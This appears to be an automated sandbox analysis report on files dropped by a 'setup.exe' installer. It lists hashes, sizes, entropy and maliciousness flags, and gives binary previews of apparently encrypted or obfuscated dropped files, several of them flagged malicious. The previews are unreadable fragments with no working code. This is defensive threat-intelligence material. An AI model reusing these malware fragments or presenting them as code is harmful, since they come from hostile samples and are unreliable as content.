              SHA1:E362B574CEAFA9C6F0C854C379FD8F82CEA9D94B
              SHA-256:051F6F3AD30A2D5F3524FAAD6E2ADF3CA25C8FB18C6ED6366B2DCCA2780099B3
              SHA-512:90CF7880D29786400E450867166D5CD77EDDEE5F0B8B59E94CEECE4E938A806D3A7087BE1421150885D806EE8504713B03E59085B6DF7A2F9CFD48FB04D7DD2D
              Malicious:true
              Preview:/** @3}.....cB&...+1;+..M..,...i....^.W.x.H..#..)......#g.L..u.;........y...9..w4C.D+SK..&......S...$..6.2.~........?...y.Vbt.....g..T..`...\.qR.^..=..i.]\....lf.rk..3aYu.p.Z......!..,....`!.G6J....;"]/Xi.8...............o9.jf}.%..-...o.FU.).B....k.....A..Vl./.}.h..<...{.>.8..P....a..j.\o.x\.U..R...Hkrm.........>.BG.....p3..yO)..o\...`.{......c....s.*.o.+.yK...4v.w.6.....{.]...Y?M/.1...'m>....x.|9-..+C3^..43.EJ...$.a....Q+bY.C%.._..)2#.....[.....9.v..G.;.....T6.....tB|..!.%.b.d...E}.....U....(.FC.yYDR"..Wr..._..c.......e_..K*l:.q.-.I..Cx../. ..s.........jN]=T.ee2pO{..T.<.....u.Tb,].%.p.Q..l(.v.CL@.....)Yf[^...,.'.2.==.=...v..Mgr0b......&.?.m.Ta.PcU.6...........|7S.......u..A.6b{.xfw.-.w.t;...+"..d.MD..g.."R....H..I.E.2.U...F.....f.....z..J.....HQ....gw....$./.TbK.g...~.......M........Lo....I?$;..#.q...'...Y.....=... V.z=mld..<...Z.1/ ,.....Q...id..b....G6u.h..p...F...rk. M.S>[..)po_]...k5...-....b.8.3....'..... .o..C.|..-..N.7.a
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):428901
              Entropy (8bit):7.028709470766937
              Encrypted:false
              SSDEEP:12288:GDh51c+pkyuNqJlef3d9V9EeLp00HlmZoYh0yh881/:G95O+GNLd9V9EeLp0WlmZoYh0yh881/
              MD5:0BAA405314DDE28D7B8E6C0B1532E947
              SHA1:196D4D77F8BDFC2E5164E28C46B39A6A7E66E67C
              SHA-256:35F1E9606BEDA8265502A4EBC7C81424B81761A4389815DDFE32EEA7E4F2F85E
              SHA-512:6C7EE652789F63F00A8BBACEC80115E7A245964B7C55CA34EB6AF5F39180EAAD727F724DE33B6E70E5F8AD54BEE05D2A1C503713C747C0754BF8544A18E1F241
              Malicious:false
              Preview:.scop......%...Z@..}.eMn.wM..Q.-..R....hqL...qZ.0..>El.s.c<q!xd..X.4e3..F..gb...J.t.;....HE.M.j.M..-...V.`:>[.....K.k..NZ....>...r<.d..Y.N.\.....p.........U.{,..F....U.V`c.94..j ...a6..s.....t.x.$;5:J..L.\..~35.[{.G...G(K-...pF.9..{~./Q.@8.Kz..,2UIz....X..^......<.!..I..g.vtU.....G..c.......B.9.^.<.....WC.........lY....2..D"e....Lk.i..[.y%FG.\...*.Y.].,y..!pb.:6......cU..%...>,f..Q.B...(.^_.]B.j......VL.E..U.M0$....A.....zg..ev..Y ..6'.."..J..7.:..4p%..;....;K#..F.'..".....q.5Q...?..ug......(.5.)z.V.T.P<......4..-Dj.@....[3I.=;?.4.M....v.y.a`6..........7..\[)&u.....O...o.p....!.,(...Y..<........>a<(j.l.Y[].....@...k......L..C.....c...mn...5......7&:....E...A#.]#.....c....V...;8"..5...|.........6th...6...q.@.jV4...<.2s.B..&...t..Z.l.....+.T..`l.9`.m.D.Q$ #..w...6.i.#....X..r...9.9.L....%hk.......Q...`.k%_..'L"".....{..h]5.e...^.....i22rT......F....t~...p.2...v....E>.8X.!>.^B..n:...:.|J...v..-.W....a.~...$.=d....E{a.....`....7./...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):17832
              Entropy (8bit):7.9895327487167265
              Encrypted:false
              SSDEEP:384:T/PPW8XFtMf1BCaTW9ksnclcym/cD1xKbOqTYi0NeQzZ4p4:T/PPW81utAuKksbym4X52LHQFD
              MD5:3A3FD494F714150CAD8A6B4BB378704A
              SHA1:5B76EB4E3E158A4E795ECF8E58800E825A5BA1EC
              SHA-256:9396BF0B46FE67EB66BBBD90197CA7B3037532E1CB722D179923DDE045FD036D
              SHA-512:0B480C0CD97E0F8AF804BFE8D070D6FA40A32F6B860B8C7FB9498CBB562F5DED733BCDDB26E30CC6A9B66DEDCF4EE1FE40CFF5E788CADC5D6C94AA5AB757C547
              Malicious:false
              Preview:!func..@.Vf...Q...x...r.4..%...66...7......Q.X.6l(; ....0k#F.MG!.<..@.vI...P3.qS}.Fd..O...?f..%.i.?'.J.l.|.mC..f._m.L$f......U.wt.....'... e*.."....._Y....@%....W.s(R...#.&.......#>.zB.5....(w.5....a...q...f.B1WC...y..W..me..B.g..X...|...JSu....bl~u%.].,../......=..f.&p....BC..;6.|.4.....sI=A?..Z.w.....3.!...t......a....}.........M.."......j(.....>=....<c...S&&.a.Al.solrjo.C.>=4.k.$.>.....@A.|G..... )....R......Q..[Y...Zj. 3x..:D)M.N...K........]{......].S.1.}O.A\.hn....v....".J....D..c...=..+>.]RX.....?...y.&....R........;..O>.....d.Wa.....)H...../%v;.M..BN..v...KN...Qo...x..\X4_z...?.k._K...Ny.M8g....p".#.....s.u?.(..FD....gmd+.Wz....'.d......r.Wq.d....H..o.x.....?j...M...v?.E..v...|d/#..........9..*.l..;'.J.....^d.W@........=....KU`z.B....L.<.haS.)h...........z...0)...].9.E.....J.u..H.Nm.^.... 0+.9T.......j..,[...9....2..72S.Q.31!W........z.h......-M.Iu.>u^.5Ni6.....bZA.=#o...I..?O.t......e.,i....m..6...{m0G.YQ....?.N.]...4..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):825
              Entropy (8bit):7.722671293401742
              Encrypted:false
              SSDEEP:24:8w4Z1Ue+sF8BmvbUC5KjWGOWX3pDs9UnbD:8wA1UelzvbUC5sWypo9YD
              MD5:8DE931B090E6FBA914F632E71C8782D0
              SHA1:B0C901F598193775399C768D669E44BC878E2A11
              SHA-256:754A660F793DE812059C5D9B849664C87217E92FA6FE4824A74F384E7F39759A
              SHA-512:B9E2140C534C2C460AE983F0E701F1A6383F2A749DD1DC79A3BD99B13FBC9F7CDCE2410BA57622368BA5BAD5E4F9E2DF0DE92F0DDEB1D7DC19C210C3B1890CE1
              Malicious:false
              Preview:var W[...*..6.K...}(.2N.<L...{.t.y6..B......4.%^.mk$:.Y... ..).v... .Ak..x...c.3.....S..dG.4.ad...............eI"....._.... .F.)...E=...g&.*.3T.7.....r..y...^.=.7..kL.....<.......J.K........a.]..:..S.....Y.._\.i}.!.G"..}ese..NcN..:^...du....l.. .,..{W..@.}%H.l..H&.....r.4......S......e<.a...j9....4|.m.aN......?..h.)73....w....i....8.z.wU....c6..H..]..7.m5...Y.?..Dj#.."...&.dm..{..8..*mMA.......>.F.x....U-..L.*..+_...d..SW...1.>.}...<|......?..d..u..a.0N.....o".1>...h..L...H.G......8b.rQ..".e..\Z..]t..+.>u..\..>..&j....hT..Y..)..y.x.2.q.X..|.h.f~-zuy2.c....{[e"Q...2.S..Rtnl..r.^.....Y.vH.H1...-....=...S"..V.\0:.y.....h.7Y.X......fb...[..hn.8E.s.&.t.ej...........j...Z.;..HF...:..R....._..*...S.U.p.y...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):115252
              Entropy (8bit):7.99838167445569
              Encrypted:true
              SSDEEP:3072:5ZfCRc5xnyPGwvJT09wCJPoQda8tR2XBi61il8H:ci5mIvJAQda+qBipU
              MD5:39884A187C9A9B80169AE62783FADCD7
              SHA1:EB5A5ED3F3C203023935A203D8814AFAF3192B7E
              SHA-256:E467F60DFF8D9D8B0C5C13C85601958CBE7F578503C3361B1D5E07EBFC562295
              SHA-512:129A1449FD24AD5FFD39F9C129757D1231C6A7450F6AE054559C2C5239B955667A50A3C57CA35D66CC3DB453845477AD70758267F9B662CA8DB4DBDB56C8FF82
              Malicious:true
              Preview:<!DOCX.... H./.ZVc-.........*..g....YO|._...l......q.$$.]..0]..........[..;..&.z.....+1......Tc..V.K.F.j\\w.....?.....7.F-}...c.pQ.h......]....^r.~.9`IV.Y6..r.MBY..B2R.1~..,T.....z..,.~j.-.-.]9*'...i..TR..h_ .........Q..y...J.k...~Q..N..A.....NN.Q..!l..Oc..-..0.e....|.n.z#:...t..+T..r.....'.-.4......NI..Z....l.}...e.ME.....[.....*a.t.y.!..0.E@.Q!.b.... .{...W..2....]..e../Qo...}.........2..Z..i...S....(s<o.'....H....%if..t...ww7.ih...f&...qD5rp...L..K.l..$..+..1G...y.D......1@@.-.%8q.*.[..f.."6Lrl.........5.VGa...{.8.+%M..,@.pr..L.....A.....W..).Gj&.".D.......r.tD..d... ....|.E+.k;..!..S~..m..Y.t...8.......~x.../...p(._.vS7......E...cG...\..o.7....E..4..$...T..n...ugg..`$G...{.P...T......@....`T_`8...@u...r<;..'.U...j.....EB~.>../}.Bi_......cX.!....,?.~.L....u...,e.z...QZ....E%.`;.mJ.6-...}....}+....X .y..-8......6%.........f...c$..p8.Ye..(-9..=.Nn...x....}xO...j.l.R..3X..z.TE.,.}.]4.2^m.......$Srx....X.v.@.n^./F.*.D&..)..r.F.e.].L..'P
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1749961
              Entropy (8bit):6.574056890932797
              Encrypted:false
              SSDEEP:49152:m+GSUX/CjrjYz6J9dDpwBcOTvz2EsoTE+rQU03GQa:m+HDuBcGjX
              MD5:08C4531267C291F6509F6D160246E08C
              SHA1:A6767CE5E2BFFFFD7B9FE0B983ED8686F40DD9E3
              SHA-256:5CDA1E5AC7C16122CEF56DBF12CB3E6374DAEE6DC5D67CAF337F2DA5EF346955
              SHA-512:0780CC902DDA534FACF58B810283C2F33F5427B6F4AA491DB129BF4BE18B21CF471C746F0019EE57DAC88F11D007F0DB003A38E05817964813935ED966DA15CD
              Malicious:false
              Preview:(func....ft#qt.i)T....B.j.h..sthH.a....b@h(d....ak.W/t..^0..U .........k.%..P.?..&K.6.5............Q.._EQXI..z...2AWR...+/...0.a....z.]...3#.!.*).`.].w..g06.Yl.].c..r*R*UdT..e..d7...d{(.......@...S.._..i..6...,H...,UW.9.Pe..^E.....\}...*.LJ(.M=.;..ux..,e<.U..Q..{.coh.kT..iM'f..<..${K*?zF.p.f...wG._..E..cg..g.][...~I..z....0B.....c\.~x........u..e....k.......4k{wH._.l...v.:D..k...).D....c.K].[..l.......U..i........F.v._....B....(M.JsGli.+.....K......Wu..O.$.....^..X.~.Z.?..#..&^1..h>?(...%w....k.9N..yo..G.V.?!.....V.fb........<.... .4_.T.)H..A A.Y.....5,..q...A.c.>..9......{4..A.0SJ:..*.z.....@....C...,8..I.....Ui..]....hl..d.F..jC..jbZ...1......2..".p.;Z._.P..fT.\p1`&..r.U..%...b..`..g.[l.U.}..4..n./?~.e0.....E.........^Z.*9.....u..^y..t`.T|....=.t&.?..}.{...E...0...s....D....dg..MHo..G.$...e_...9...p...:W~...5...UF...m$. (t......E. .6h..<..d...1..aTTBN.Vg..Hy2.5A.9q..K;.l]..t..n.}.k.J-..-.D.....\..d...J...H.8bG%9...u...r..4.a.I.$R\.1..J.$.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):467497
              Entropy (8bit):6.283726859907156
              Encrypted:false
              SSDEEP:3072:j7A8tfB68KtG3pSevQmBDlXhGd0csy0CPMsc8o12zojheQha8yZZin:jk85w8Kt0plvQkxXC0csCdrozjhaNZin
              MD5:6142909AAEE3A45271A1C62858E9D361
              SHA1:24108AB8FA3E7872C5E8025DF6EB0688FC172D5C
              SHA-256:DF4BE5B930B141AA311DE14B438F11DBEFACF6E7DBCDB50C4747FC3D7782EEB1
              SHA-512:F0AF2ED4B42FCAC5044AD9E5E67BF9727277DDD0371ACD43774C73983D83E2923972DDBED57AAF87E447870ADCCC69EA3AC94D5A11945E925F334AF29F4EDCB9
              Malicious:false
              Preview:var W..lF..H..nI.:.=... ..j.0...;.]...d&.....5..a3u.._3w..6$...^..Qu..C.2^...+.........u..h..g^..kI..M..Z......F[.Z..C.w.t..B..g.l.F.C...J...[zn.L.Rpu..I...f...%.2..V...Jx....hK....{P.z....D.&y.uE.. .q....g.U.?..-S.j......g].P....<.&O.ka..H......`....Ks..t.2_.,..!q.j..Z...r.k<.[..R1&s......$..[7..].......mB.h...8..Fs.@@......i..8.....,-~....c.JF"..x!5.5...zD......Z../.].R-.K.$.......].|......7...U....c..{..M.E..t.-....#.v........a...2....&..m....1|.....I.i....:.|...n2*.4..p~....]8..Aa..}...0.w[R%.L}..t.7...`y.'i...>...&..^3P.........i--tIB:.f...R....(g...d.".........i.?Ac.:L..Y....... ...b.W..c.5,n..9.z.W.4.J ...Q.....U....:....W3F...]....(.9...>.)a..Cd.]...].EzEk.W..$W..C..c6......3...!....<v....3]...2.......N...K..j..........a.HV.'.Ni.g.O..nER>.S...fS...~...y.....A..(Q.......P.x..]........o.1...]~..t...F.<B...uB........C........jiX!.k'.+j...k?. .1..k...e...M......j..r.S.......kF0P..g.^..t....[.A.}Y..=.F.P3...R....,T......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):9214
              Entropy (8bit):7.981612846251447
              Encrypted:false
              SSDEEP:192:AxiHbOiXpw4H+ofdweRr6VH/cT1JohymJG8PL6GIvC:AOZXd2uT1CnPR
              MD5:109200976B54FC15BBDDF9E5E66722EC
              SHA1:12C5BA34018C581A46692B5FB94B226D8BD37BC7
              SHA-256:34FD51B5B23A67B951E394F1BECFD47EBC480ECDDADC43E7367618735CF0D453
              SHA-512:0D988C24FDAC81024664831FE8771112751135CB1A9778FF8BE0D7EE3737DFFCD6F47C40AF36841DF0DA1BBD395EE34AF6813E0B807317FC3ECDCB389FF65F87
              Malicious:false
              Preview:var F`9... ....k..6.-..K.qv...K..'~..K.3...&....Q........6~....0...y.j..FN..(^.~...+..1J!.)..@8.iJ..\.......).....7S=.n................j.I...x.h.=..p....>. A......R1.,..@k...#.....s.[\.e....G0..c..!.I{.L...x...n.s.K>..........MPO..>...O.G..2}.y.4}I..%....Q....fck4..V.m..&.....hH.{9!BV....{.%....a.A9p.KN..g..{._.:.:o.....4|.u.G..(@.....R..C.v.6(^......Z.@(T....L....w...C....x.la_f.....;...R..M5...T..='+"h@.C.e.6..wGQ...e[..&...1....m_..uO.=.:.....1......O....O......'.@0.+6.D...(_e.'W..4W..B9i"...[..h.%.{....5t^m..pG.I6....j,d"..z......O..r.ve..x..........M..f.gX7..N......Z..M..odZ) ...IH;\.T...F.AJ.....0.Q...[..N....D0Vd..".16.2.u}]..m. .R....`f$.$>.. ...Zr^6]......V?..L...n/..r..a.x4H.dz..:....Z.X...|...1z.N.$;bb....PC[S.AO.YZ.......OBL_..I.+.?.d..boSH0.Mr..0."`.Q....A(.$......`...>l...)(..b.2-G.8H.....r....4..>..C..xw.6A..7..w..>q.V..j...>...A..FV..-"..<..m..Yb..v.....@.(/.....o,c.......w@......~.8 ....q.0.......;.L.>...z\......Zg...\..&..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):16105
              Entropy (8bit):7.987724435397407
              Encrypted:false
              SSDEEP:384:wsgGuHjsY1YuaE6FzIRavZrlceIVmhSFw/GZRLzDIGkO2UL6V/:wvPCuowIZYVmhSFw6vcQ2X
              MD5:73583738AD69CD066ACADDB3587FF634
              SHA1:F7AA4FD3B52D8A525466814A907B9FAE77CD6C8B
              SHA-256:365136B9A2FE42C4B36E9B6E308C1E20FFFFEB70A37979501C4FC0ADA9FAA46D
              SHA-512:905A5215924DFA54E5E9EF1A5AF1F684CF134E35714F0569E8FE33E2A5A321A5CF3EC91B0A2B76C3A323D62B074B8F7FC6ECC311926311457E880CC70655AF22
              Malicious:false
              Preview:var W#..h...1....^TW.......>.}....a.J.}.W5.e..&......$.....#).\.a..tm.fyS. .w..d..Aj.@,V...Gz.a....3..._..].ty....2.%H.0xK.].m.%...`J... N..#....#.v..+.wz+..~@,.#.t.d.\BGYG.....^./..._..4]..7......u..$...av.Lj.,..B.7...W-G..69..km=S..@2..u..b....q/n1$...#{.z...f..?..{...[.uX.v-!...?.v.@r.'...#.nI...5f..S...u..+d...o......atz.Aq=.....AH..i|.z...q..'..|.N./.N....<.S.*....L..l.J>.D..'.s.~r...o.h....N..@4+w...@hs.W......k17=.\.R.T.c.].4.c.]_f....^.s.....c..1.-#M..)..f..y..........47|.a..u...U.s*..x.....a.8..dM&...G..N..e.b.0/.o....F......9..vU[.&%L_...._..wf.Y.L..p....X. .0....F...w.^.*<`,.3f..UXF.. ..C#..9eQ..^..T..|.....|Z.Y... .-......l...IXP...t....b.$.....pyy..."....8...q3.....\.:.eqd.@...v........[.....H..n.3q..e......~<#.?,1..N.U?..3..Q..Q.._B....z.2*.....w...&.o.:...b..O.....F=..."....?...k5:.....(..hq.....6x..hj..RDI....^..9..H...Eb.`T..t.h(..i&^..2!.s(..E+.....H.Ff...<.Sq.).<....lf.?..`.Rg.<.....*..%q:...?mx.jn.......<.~(Z....x.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):105444
              Entropy (8bit):7.998220400399641
              Encrypted:true
              SSDEEP:1536:N7xMJ13tnsTshBTkaiuDVn04SjuZvTEIkfPvqV/G0A+LpZ8dRGQUPVvFjMH1kszg:N7S3tnrakVnzIPCV/N71je1kBdmImk
              MD5:3BA622D688E664E9FB28D1C08A61128D
              SHA1:D0860AA2EF3C35D8B50D50D9D7AE5B9EB42F35BC
              SHA-256:F30C9CA76693B68E3F55885B6ED638C7C6A56425A38116FE26F178CF2FAADF59
              SHA-512:A3FB06AC34F0E10F4EF7F58AD589F4B87376BE0D567D717194B07941ED5FDC9D3ECBB25BAC73F3A088FD5322C8BBB65FD5459840CDCD886D68270937F979F822
              Malicious:true
              Preview:/*! C.<JQ0.....CY.V.As..Mo.....x.H.m...L....Z0......eQ.R..E...j`V`i.N...C..Hq.,.....'..C.-.....Cz.3..I......su.... ...NOa.a......'.k.v.$.<.M.g...w.<.w6...N......~..tI...Y...."{..R.-.{.G....,.N.x.".pF<....?...wW....=9J.21..r.$7..Qe..o.Y.?.......i.....\2.r.M..o4...p.D.....F..HJ........iE......<\....^...k......N.;.u.ux.>Q.<,....S..X.h/-.'R.kvC0.....B...o..t..W.jr....CO.Sr.7..]H.*..P.>..;S...B;.(.....7.9.+..[/wf.9....F.:..Gj....R....Do..@...;R7...(...........<.IQ..X....o...HQ.......$a..z.r......]......E....<.....1x.h=.?*.\.sj.....R.G6.....W:F7..C....?6F.DJ...w.....!.H.c...P. /dc.....L......V.".%..7qd..d}...w.....p9..[....^O......=.J?9..~N.W......YF..c.Q..vF.F......qr6"(#I2!o.............p...K_q=Z...'./.....d.&WUT.C(.....**srf,..\....C......=)V..qfQ<....N........TnoHHCA.F.N.....aTv..j.x...vJ....z.."u..h..J.+.......k..wE8.Xm.QW..Du...&.h.8.C.....-.......f^..,\..&j.......=....+>..`.V.+9*.b..d.;*.qx.RU.0.j.v...u.2.....B...%....C.t.2.t2!.F...{#
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):14501
              Entropy (8bit):7.986697406062763
              Encrypted:false
              SSDEEP:192:oYKxUxoUl+GMp2PmKDxJ9p8xrhWe6AownoWNA7QSb0ZCq/3RIPmVJKg828:AGxvh8tL6AnX5u7q/3qe7KA8
              MD5:E227E12BC05C5D0541B9EFAE2FAE0CFC
              SHA1:B158FF679FC8039422AE8D29E4AB752B41145496
              SHA-256:42780E764FA7588196DF6A520BF0D8DE401807991F2F3B9759E4079C3132E4E6
              SHA-512:26536CA685BA8404741C5F6D67BB88F6DA91FAD04AA6737ABC39CD4273AB93A4A53E258DD260E0C8AB388B56BFC72B80280F11EB014A901908EBC695BD923926
              Malicious:false
              Preview:var WT<..8....?Q-.q.S.N.&+.E..5....Of..i.8..J.S..8.....z;.H..c..Z.[./....}..@js(.....r....$X.;...1..@'..r......{.I.......Nt.,...e!.v.S~...7D 3#....6s....$X..ha/2.f.N..3?..[.7.)..V.jY..)A.XV.Y...:q.6..d..8....%.C(&.S..6..+.i.7}L.....T."..jG.....d6..6.(..~.CL..,.......G.v..Y..^"R.|..h%...].2.F..#..p)......{.6.....8Z.z......-...\Dw.:ro..JG..D@...v.x: 9tQh..!.m....}...`..jj.X.RiEp.y. ...l.K....f..;...BP.......Q.....H...."=Z.......U..wDA.....,z.....O...2....]{.....A.'X..P.kE.QlO^..GVy..u...=..........h.."..'......n.i.......k.S.h?...g#)...V....83.$..w....1.=M^6..E.W...<.Jh.#.p..o..{..mS.....T.f...Kf..QUH..(.A..5}P....b..L..'..W.....(..l.v..(......kr.3.X......[-./.....A..?..^D.<p....5.....N.X.*....!...e;...L..........5N1..3.92..T.EsD.O.M1X.zw0..'....~....S...:....@k.J3..W..Y5..z.j._B|i:.......$v.....T...0....riQ..:Fkg...O..L..2u+..5&tm.2.J..M...Hq....F.>.J.1........JgK...-..4...K.;+..{..p1s..[."......M.J:`\)...?.R..'..QDfE.Z7b.&.*...[/..C.869..T..e
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):340
              Entropy (8bit):7.271266718766393
              Encrypted:false
              SSDEEP:6:j61qgBDHAvklJ8ODI2XEMyMnPQHGhM60UwtwqAPX6DjaUGm0WsXkNR2cii96Z:2VHJlJfc2VPzO3Uw6qy6D/sMR2cii9a
              MD5:E073959111E65DEF0D1460AE32E61427
              SHA1:159CFCB242109EA72D42EC2CF9AF1656DA4FF928
              SHA-256:1202BC968DCA1D70E1C379F44DB70CDF663300A1B775E39E5AE549BE0EE209CD
              SHA-512:FC277768112F829633EF023FCA089C3F156D3CCD303ED3D36F4336602B0F3D7941B3DF103CA154E8B1CE3A92EAE1DB0E5E04C31241AEAF75FB658C347DB6E75B
              Malicious:false
              Preview:z{a:1.z_...AA..].~.1...c.._..5...e.....,.).....;.2..+Cg5...)=C.GC.T>."./(.|....p.G.bY.B(.U.....C..D..V7.`wW.....V.l-..#Sr.V7..0d.N'&[.9ac...B..s.....E....)..^.E...m3..h.n....l...!..K6.....x.J;.u.o.}......8...e#*...4_@O..4..._h........OIm.P.....-...9qujGVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3201
              Entropy (8bit):7.952083857954812
              Encrypted:false
              SSDEEP:48:Wl4jaRPcgQJ6pRyr0YaBDr7hf5gIH7nZt97rkGX5peduxtkS6HwIhmSTXcTaD:AMArVV3poGX5pzQamXCy
              MD5:D9BE829306D5849936D954DD780F01F3
              SHA1:8711E0B6ADB0AD2C62C73FE86A512D60DE52C11F
              SHA-256:EF10F23B8F17463B231C15D6B71F68E6D5C42CCF916D44282AF4B5D75B7E5116
              SHA-512:75C0D4278E2C68220C446316B4678EA428C1C6AB924B8C59F78CAFDC9AC74FF5F0876A1E05961F97763FE18EC0B96C3C86009996CA084C1E604682595A608D44
              Malicious:false
              Preview:var Wm....R3....L..c../.....s.hK..sq!?...W$....A..j<.."...N"....2.....K...X?-.T.q1...V.t^...{4S.AJ..#4..r.U.v.....'...yW.!..\y?..p..cx..fL....]...p.Jq.l\z..7..~....M-.t~^dI.q..5....v......w......H..._.x.7...n....PO..:#....e&[(.~.Y?.#....?v.6.;K.......Hn..`+.......).....Q..8X...T$....}m............p.9?.E...I..$>...EQ...j.%.8I..\.-..."..A....&Pv.^...i.........6.%..l..}.%....E...,.&.;D.u...x@..10i.....n....&.|.I..R.#az..f.X]...a.".....~r.>.@.a9.2_.W.....Cn:..8;`i.......`.VI/@..V<p....H......O..qYGv..J.U..-........*;0...T..J. .....Z...f.=...V6@m......$.....%|>.7&.H3. 8.Z.wKrur.~.~..f..}....w.&.`._.....y't.'....[..Q*....o.0..bw.HH.V.............n.f...S9....-.7....nW=....N.......Y....Lg>x..p=...>g62...n_..RPfx.$%3...=>.}.1....L..O9j.V[m..g.....E.I.[.....@..........~..7.(F..md.........x.b.yhr.j....... ...R./.Za'<Yq.)W...D...C.Bl.Y.D..F.a..K...E.. ... e...V.x..6.'..<z.N.88..G...{.W...<P.s.yW..G.>s.oT.?./^..........`.........:.....B.i1..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):11147
              Entropy (8bit):7.98563532673115
              Encrypted:false
              SSDEEP:192:iNx7m0rhWcEJJUFbPyKFksg6AYj8yAVOCBe944DxSsjVBJF5kUZy41ghHToYmuS1:iN0y3mJU9PBgHYj8yAVOie94cfJ7kJ+N
              MD5:4AB84F9C7F202D6119BE99553A9FDA39
              SHA1:DC53FDBD85D27C3EB69F895DCFE0C7648607DABF
              SHA-256:0E35B36C71B8235C79CCA6D18E3878A41F45C236821E69D578CFE5A6F54C7063
              SHA-512:758B1AF6F61A3AF6C08E596B8A4860189195398B38C977A1AD9F4C431BC7EC28AD2042F5B15D8F7CD28E7AB5CF6E540CB0595207E26BBF602F2F698CD214D63D
              Malicious:false
              Preview:var Wc...Md..v.:..-..v.R.....\9P.BDGc.a....OB.gSC...lj..jd...h.e7...;.......[..%.1.~ ...>~..A....6tV.VJ.&(.69D.~..m.6.DiD.v'.%~...2>%.vN@..c.......ao7.C....^.o...F...b....;vC...<6.)&#~.......a..l.......6......gv..3.....6..z..U"...C.j.#.*.U.u.f...c.+#....DaN>....3..g.........m...;lM.=`.E@hqK%.Y.e5...+#.....=.;N.dr...".Z.=.....}l.E5i2.K#E....c.......V.Qj..6..g.y.......x.g.;.-J.M.. .......8}.b...d.......x.x5...=..x.....h.>...,>....9..m9.E/w..&..#..Y....SH.Sg..}^B."._...W.P...9...1vV.A.Z].i1....98..^.,ij.Z..n.4....m..bS0tq........)g.........F.....Z(.*..j.'..U...[.....q....Q7.z......l.=.I....8.1*3..z..b...8P5d..z..?)n.E.$......s'.-.|^.WoJ...:D...............t....$.z.!.........Bp..&GU...6....hf..C[...B.e..P...w.o........[.m.]R,!..j....+.la,..$T.>..h.I.I.".D.2.l7......V...^".U.s....`1.'._'.B-.d..3.......&..r8e....$.6..){7..8.....}.-.pT.t1z....0=.$G.l....6......AR.5j.l.%..H/...H[^.....(...0...q4}.Ha....2.............0.]3~.7..e..G...T.....0.C..o.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):545335
              Entropy (8bit):7.032215661915982
              Encrypted:false
              SSDEEP:12288:KQORfJp/ypd+v/TJoaV4MYwRjMIP0dUW6cUlAvO3WWtAqyebWvTOQY:POV7ypTwRBP0dUW6c7OQY
              MD5:556DC1EF56442DCD101F8C7143F74A6E
              SHA1:2F0441B5E6D8DEF411E65C9C3CAEE5BF8B5FAC57
              SHA-256:4ACEFF4FBB8303CD30DE9C4B77F9B78DC4638C8D6F42E9587A06255AF2A33F80
              SHA-512:7928BD13FD19594D167DB21240CA72764FE7A84D9064E72CFD115BA35D79E5541252159F6136DA0FA583FFD4E89A8C34DE70662FE086D1608110DE4CB9AB45CD
              Malicious:false
              Preview:(func.l..8.=,.."M.ZMP.......YU%z......f...^...Z~..<>u.,......5u...g4rX"d.....{..g&Xt.p..(Q....D.g.Z..5!...R.a...m.'....;aR....g..u.....z.......#...........89.";..."S......D. #l...k..M.Nxc."C.A.N........Q.r..5.....8U...0(:v<../c.(.B.....X..4..KM...(..pE.o.....'.`....37......<......y7,GTMem...*....\....6......<..k.R....,....a{...@.....5.......)'$_.5.&....sl..D%.....c..f8k.........i....f...........0D.i....-.EL........^..%W..........|.......n.......!Mj]..D...ApwT......|.C.%RZ.....w..g.Z..O..\TM..E.t...S\..c....u...q.i...|YP....c..A-L...KP..}.`>;....*...\..nw A....owfXg...AG.....>..-.........q....~`......S...or~.27T4z.^..@...o$..Y...g3.[ p.QkZ.....Y.[.!.B.I.E0.]O....8..eUj........Y~#..c^.Z...i.....dA\g.|\p".......d...:6s......2....7...0,D..g..n..)..E.).....F.Pq...........6.j....h..4v..#A.....aq..P.@..W#..RG...-.X...(z.G.....}O5..\..A.Jj....~...{.c.w.......`......K.]^$.....!;bZn|'...KB..g3}.R.x.....8..$.Cf:......2.f.........K..vNf..~..r....=h.o-
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):59090
              Entropy (8bit):7.996636585754884
              Encrypted:true
              SSDEEP:1536:8GWCtSw8ueXgS9gal7NuchJA7ogYkCkkuNrcD0RyWV:8GfyuSruF7pRAuJ00Ry4
              MD5:1DB6E47EC81E0CAC699822973DE18B4D
              SHA1:A207805AF73DA736A9700AB9BC039BD7F9E2065D
              SHA-256:F7F9EAF3428CA70AA01F08B28E9089953A78F79F404496B02614406CA484CE24
              SHA-512:6B36BDC1AEB51ADA2A8D31436A64BE5EAF788B99E7A39ACEB14A974F0257F8A8A517782E1F7C396FA948E95C71BC20996DBD3892315944DEDFCBB32FE227A5EA
              Malicious:true
